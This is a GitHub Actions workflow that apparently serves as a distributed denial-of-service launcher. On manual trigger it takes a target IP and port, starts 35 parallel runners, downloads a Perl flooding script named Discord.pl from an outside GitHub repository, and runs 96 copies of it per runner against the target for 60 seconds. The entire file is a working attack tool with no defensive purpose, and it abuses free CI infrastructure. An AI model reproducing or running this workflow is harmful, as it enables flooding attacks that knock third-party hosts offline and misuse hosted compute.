name: Discord !

on:
  workflow_dispatch:
    inputs:
      target:
        description: "IP !"
        required: true
        default: "127.0.0.1"
      port:
        description: "Port !"
        required: true
        default: "53"
      
jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 35
      matrix:
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35]

    steps:
      - name: Checkout (optional)
        uses: actions/checkout@v4

      - name: OK !
        run: |
          TARGET="${{ inputs.target }}"
          PORT="${{ inputs.port }}"
          
          wget https://github.com/ahmetdonmmzz001/Discord/raw/refs/heads/main/Discord.pl -O Discord.pl
          chmod +x Discord.pl || true

          PIDS=()
          for i in {1..96}; do
            sudo timeout 60 perl Discord.pl "$TARGET" "$PORT" &
            PIDS+=($!)
          done

          for pid in "${PIDS[@]}"; do
            wait $pid
          done

      - name: Finish !
        run: |
          sleep 60
          exit 0
